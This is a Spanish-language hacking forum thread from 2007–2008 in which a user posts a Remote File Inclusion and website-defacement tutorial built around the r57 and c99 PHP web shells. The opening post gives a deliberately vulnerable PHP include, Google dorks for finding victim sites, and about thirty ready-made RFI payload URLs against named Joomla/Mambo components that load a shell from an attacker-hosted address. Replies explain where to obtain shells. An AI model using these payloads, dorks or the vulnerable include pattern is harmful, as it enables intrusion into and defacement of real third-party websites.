Normas del foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Diciembre 03, 2008, 10:53:32
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Defacing  |  Tema: Video tutorial RFI r57 & Deface by Socket_0x03 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Video tutorial RFI r57 & Deface by Socket_0x03  (Leído 5436 veces)
Socket_0x03
Miembro
*****
Desconectado Desconectado

Mensajes: 93



Ver Perfil Email
« en: Octubre 26, 2007, 12:25:36 »
juegos gratis
Posiblemente las técnicas del RFI ya han sido posteadas en este foro, sin embargo, voy a agregar
algunos datos más el video, de forma que no solamente se vera la teoría sino también la practica.
En el video también se podrá apreciar algunos de los funcionamientos de la shell r57.


-------------------------------------------------------------------------------
-------------------PONIENDO TU PC VULNERABLE A RFI--------------------------
-------------------------------------------------------------------------------

-Desde el servidor que vamos a poner vulnerable:
1. En el php.ini de tu servidor web ve que tengas activas (en On) estas funciones:
; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
allow_url_fopen = On

; Whether to allow include/require to open URLs (like http:// or ftp://) as files.
allow_url_include = On
Si no las tienes en On, ponlas y reinicias la computadora para que los cambios
surjan efecto.

2. Crea un archivo de nombre index.php y le colocas el siguiente código:
<?php
include($_GET['page']); //esto incluye cualquier link que se especifique en page
?>

3. Crea un archivo de nombre archivo.htm y le colocas el siguiente código:
<center>
<b>Hola Mundo</b>
</center>

4. Coloca este link:
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion y veras el mensaje "Hola mundo"

5. Coloca este link:
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion y veras la web de google

-Desde el servidor del atacante:

1. Colocar este link:
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
   y veras la shell r57.txt


-----------------------------------------------------------------------------
------------------------------ATAQUES--------------------------------------
-----------------------------------------------------------------------------


------------------------RFI en include page----------------------------------

Como tu eres el atacante, coloca la shell c99.txt o r57.txt en tu servidor
web (ej: IIS, Apache...), de forma que quede así:
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.tuweb.com/c99.txt

2. Para buscar una victima ve a google y teclea: allinurl:index.php?page=
3. Una vez que seleccionas la web borra todo hasta el ultimo / y le colocas
la siguiente línea: index.php?page=http://www.tuweb.net/c99.txt de forma
que te quedaría asi:
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.victima.com/index.php?page=http://www.tuweb.com/c99.txt


más ataques:

en google colocar: powered : war v1.5.0
RFI: admin/admin.php?vwar_root=http://www.tuweb.com/c99.txt

en google colocar: powered by Eqdkp 1.3.0
RFI: /includes/dbal.php?eqdkp_root_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_htmlarea3_xtd-c"
RFI: /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_sitemap"
RFI: /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_pccookbook"
RFI: components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:index.php?option=com_extcalendar
RFI: /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_forum"
RFI: /components/com_forum/download.php?phpbb_root_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_performs"
RFI: components/com_performs/performs.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_comprofiler"
RFI: administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_zoom"
RFI: /components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_serverstat"
RFI: /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"minibb"
RFI: components/minibb/index.php?absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_fm"
RFI: components/com_fm/fm.install.php?lm_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_flyspray"
RFI: /components/com_flyspray/startdown.php?file=http://www.tuweb.com/c99.txt

en google colocar: inurl:index.php?option=com_simpleboard
RFI: /components/com_simpleboard/file_upload.php?sbp=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_hashcash"
RFI: /components/com_hashcash/server.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_smf"
RFI: /components/com_smf/smf.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_pollxt"
RFI: /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_loudmounth"
RFI: /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_artlinks"
RFI: /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_galleria"
RFI: /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_akocomment"
RFI: /akocomments.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_videodb"
RFI: /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_securityimages"
RFI: /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_admin"
RFI: administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:index.php?option=com_pcchess
RFI: /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_multibanners"
RFI: /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_a6mambohelpdesk"
RFI: /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_colophon"
RFI: /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_mgm"
RFI: administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_mambatstaff"
RFI: /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

en google colocar: inurl:"com_kochsuite"
RFI: /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.tuweb.com/c99.txt

Notas:
-Si no tienes una web con el c99.txt o r57.txt puedes usar la web de otra
persona que tenga esa shell.
-Si tienes una shell como c99.txt o r57.txt y quieres ver como se ve desde tu
servidor, guárdalo  como c99.php y lo ejecutas desde
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.tuweb.com/c99.php




Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Video RFI r57 & Deface
« Última modificación: Octubre 28, 2007, 12:35:26 por Socket_0x03 » En línea
j4ps0n
Habitual
*****
Desconectado Desconectado

Mensajes: 274



Ver Perfil
« Respuesta #1 en: Octubre 26, 2007, 05:29:45 »
Muchas gracias Socket_0x03 , tan buena info como tus otros videotutoriales Wink

Salu2
En línea
Dr.SysCrack
Colaborador
*****
Desconectado Desconectado

Mensajes: 407



Ver Perfil
« Respuesta #2 en: Octubre 27, 2007, 12:20:28 »
Men donde esta la pagina de para descargar el video tuto para poder aprenderlo mejor esa tactica y eres muy bueno haciendo video tutos debireas de hacer mas jeje

salu2
En línea
Entra ya.

foro.level-23.org
Socket_0x03
Miembro
*****
Desconectado Desconectado

Mensajes: 93



Ver Perfil Email
« Respuesta #3 en: Octubre 27, 2007, 04:43:34 »
Buenas... Dr.SysCrack y bienvenido al foro =D

Les agradezco humildemente sus comentarios... Los videos siempre los coloco al final de cada información... xD

Siempre trato de hacer mis guias en forma de videos tutoriales ya que pienso que una de las mejores formas de enseñar es a través de ejemplos en donde se muestre el procedimiento y sus efectos, algo similar a llevarlo a la practica.

Un salu2 xD
« Última modificación: Octubre 27, 2007, 04:47:50 por Socket_0x03 » En línea
ActiveSheet
Recien Llegado
*
Desconectado Desconectado

Mensajes: 7


Ver Perfil Email
« Respuesta #4 en: Noviembre 03, 2007, 01:00:15 »
lo que yo me pregunto, que rayos es esto?


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion

y que significa esto?

 C0d3d By The_BeKiR & TiT & Ruslan por que no dice by Socket_0x03 ?

que cosas tan extrañas no te parese?
« Última modificación: Noviembre 03, 2007, 01:15:16 por ActiveSheet » En línea
Socket_0x03
Miembro
*****
Desconectado Desconectado

Mensajes: 93



Ver Perfil Email
« Respuesta #5 en: Noviembre 03, 2007, 05:54:17 »
Cita de: ActiveSheet en Noviembre 03, 2007, 01:00:15
lo que yo me pregunto, que rayos es esto?


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion

y que significa esto?

 C0d3d By The_BeKiR & TiT & Ruslan por que no dice by Socket_0x03 ?

que cosas tan extrañas no te parese?

Pues en realidad yo lo veo en blanco, por ningun lado veo que diga "C0d3d By The_BeKiR & TiT & Ruslan"
« Última modificación: Noviembre 03, 2007, 07:06:09 por Socket_0x03 » En línea
ActiveSheet
Recien Llegado
*
Desconectado Desconectado

Mensajes: 7


Ver Perfil Email
« Respuesta #6 en: Noviembre 03, 2007, 09:45:10 »
varas, si vez la pagina an blanco, si tienes mozilla presiona Ctrl+U o menu ver codigo fuente.

no dice nada por que esta en html con codigo de php y lo detecta como comentario.

y lo que te digo que viene con eso de "C0d3d By The_BeKiR & TiT & Ruslan"

esta en el archivo

heykir.txt

es un codigo echo en php pero esta loco por que asta tiene graficas echas con java  con el signo de turkia

bastante raro no?
En línea
vef
Recien Llegado
*
Desconectado Desconectado

Mensajes: 7


Ver Perfil
« Respuesta #7 en: Noviembre 07, 2007, 01:02:25 »
Y como creo un servidor web?? probe con el apache pero me daba errores :S

se puede acer desde algun servidor como gratisweb o algo asi?
« Última modificación: Noviembre 07, 2007, 01:04:39 por vef » En línea
Lusa2
Recien Llegado
*
Desconectado Desconectado

Mensajes: 5


Ver Perfil
« Respuesta #8 en: Diciembre 11, 2007, 01:36:25 »
Ami concretamente lo que me pasa esque las opciones k hay k marcar al principio nose como se configuran en mi server de iespana.es.

Me aliviaria muxo 1 respuesta

salu2
En línea
Socket_0x03
Miembro
*****
Desconectado Desconectado

Mensajes: 93



Ver Perfil Email
« Respuesta #9 en: Diciembre 11, 2007, 04:14:23 »
Citar
varas, si vez la pagina an blanco, si tienes mozilla presiona Ctrl+U o menu ver codigo fuente.

no dice nada por que esta en html con codigo de php y lo detecta como comentario.

y lo que te digo que viene con eso de "C0d3d By The_BeKiR & TiT & Ruslan"

esta en el archivo

heykir.txt

es un codigo echo en php pero esta loco por que asta tiene graficas echas con java  con el signo de turkia

bastante raro no?

Es una shell como cualquier otra, así como la r57 o c99... Solo que el código fue hecho por esas personas (The_BeKiR & TiT & Ruslan).

Citar
Y como creo un servidor web??


Con algun servidor HTTP como Apache o IIS.

Citar
se puede acer desde algun servidor como gratisweb o algo asi?

Generalmente los servicios gratuitos para alojar paginas webs no dan permiso a este tipo de procedimientos, sin embargo esto va a depender de las configuraciones que tenga cada administrador en su servidor, lo ideal seria que montaras tu propio servidor HTTP y realizaras dichas configuraciones.

Citar
Ami concretamente lo que me pasa esque las opciones k hay k marcar al principio nose como se configuran en mi server de iespana.es.

Me aliviaria muxo 1 respuesta

salu2

iespana.es es un servidor para alojamientos de paginas webs, los usuarios registrados solo tienen acceso a las configuraciones relacionadas con las webs que quieran alojar, mas no a las modificaciones internas del servidor (php.ini). El tipo de configuraciones que explique anteriormente son para administradores que tienen su computadora como servidor HTTP, en otras palabras, tendrías que colocar tu computadora como servidor HTTP, tenerlo configurado para PHP y de esta forma realizar las configuraciones para el php.ini.

Un salu2 xD
« Última modificación: Diciembre 11, 2007, 04:47:05 por Socket_0x03 » En línea
Lusa2
Recien Llegado
*
Desconectado Desconectado

Mensajes: 5


Ver Perfil
« Respuesta #10 en: Diciembre 11, 2007, 04:47:34 »
Mm....mejor me voy buscando alguien k ya las tenga subidas....xD

salu2
En línea
Carlmycol
Recien Llegado
*
Desconectado Desconectado

Mensajes: 2


Ver Perfil Email
« Respuesta #11 en: Marzo 11, 2008, 11:35:41 »
Muy bien pero coo se consiguen las sheels¿?
En línea
Socket_0x03
Miembro
*****
Desconectado Desconectado

Mensajes: 93



Ver Perfil Email
« Respuesta #12 en: Marzo 11, 2008, 01:13:47 »
Cita de: Carlmycol en Marzo 11, 2008, 11:35:41
Muy bien pero coo se consiguen las sheels¿?

Buenas... Carlmycol.

Google es uno de los mejores buscadores para encontrar shells... Si por ejemplo estas buscando la shell c99 vas a google y tecleas "allinurl: c99.txt" si estas buscando la r57 tecleas "allinurl: r57.txt" y de esta forma podras encontrar muchas...

Un salu2 xD
En línea
Axus
Moderación
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 3233



Ver Perfil
« Respuesta #13 en: Marzo 11, 2008, 02:19:10 »
Cita de: Carlmycol en Marzo 11, 2008, 11:35:41
Muy bien pero coo se consiguen las sheels¿?


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion

Saludoz! Wink
En línea
ZergioOx
Miembro
*****
Desconectado Desconectado

Mensajes: 21


Ver Perfil
« Respuesta #14 en: Julio 27, 2008, 12:01:37 »
como hago lo de poner pc vulnerable en mi host es pago debe tener esas funciones activada, es decir donde encuentor el php.ini en mi host, no entiendo :S..
En línea
Socket_0x03
Miembro
*****
Desconectado Desconectado

Mensajes: 93



Ver Perfil Email
« Respuesta #15 en: Octubre 09, 2008, 05:33:38 »
Cita de: ZergioOx en Julio 27, 2008, 12:01:37
como hago lo de poner pc vulnerable en mi host es pago debe tener esas funciones activada, es decir donde encuentor el php.ini en mi host, no entiendo :S..

Buenas... ZergioOx.

Aunque la respuesta es un poco tarde aquí te va:

Si quieres poner un servidor vulnerable al RFI lo ideal es que primero estudies un poco de programación en PHP y luego te enfoques en esa parte del tutorial. Después de tener un servidor HTTP en tu computadora, puedes descargar e instalar el PHP (dentro de este encontraras el php.ini que estas buscando).

Te dejo lo mismo que te escribí en otro tema de esta misma sección (defacing):

Dentro de la informática hay que tratar de ser un poco autodidacta ya que así se desarrolla más habilidad a la hora de resolver acertijos, te lo escribo por la cantidad de preguntas que realizas constantemente basándote en diferentes propósitos, lo ideal es enfocarse en uno o dos propósitos y perseverar en ellos siendo autodidacta, ya que si por ejemplo, un internauta se enfoca en 20 propósitos y se crea varios nicks solamente para soltar miles de preguntas en pocos minutos y en diferentes comunidades (basadas en más de 20 propósitos) esperando a que otros le resuelvan todas las dudas, no creo que sea un buen camino para obtener más conocimiento en la informática.

Saludos...
En línea
jj00k
Recien Llegado
*
Desconectado Desconectado

Mensajes: 12


we dont need no thougt control!Pink floyd-The Wall


Ver Perfil WWW
« Respuesta #16 en: Octubre 10, 2008, 04:27:06 »
le entendi muy bien, muy buena explicacion y todo aunque creo que te falto explicar el bug pero bueno no me alargo.....solo queria preguntar que donde concigo un host gratuito con esas caracteristicas que mensionaste =) ??
En línea
jj00k (+14)-(-1)^¿¿ CDP 7 46001 2
Socket_0x03
Miembro
*****
Desconectado Desconectado

Mensajes: 93



Ver Perfil Email
« Respuesta #17 en: Octubre 10, 2008, 05:14:44 »
Cita de: jj00k en Octubre 10, 2008, 04:27:06
le entendi muy bien, muy buena explicacion y todo aunque creo que te falto explicar el bug pero bueno no me alargo.....solo queria preguntar que donde concigo un host gratuito con esas caracteristicas que mensionaste =) ??

Buenas... jj00k.

Un servidor para alojar paginas webs gratuitamente y que al mismo tiempo tenga para realizar un RFI, lo dudo, tendría que ser un gran descuido del administrador, lo ideal es basarse en otros procedimientos.

Saludos...
« Última modificación: Octubre 10, 2008, 05:20:47 por Socket_0x03 » En línea
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Defacing  |  Tema: Video tutorial RFI r57 & Deface by Socket_0x03 « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.7 | SMF © 2006-2007, Simple Machines LLC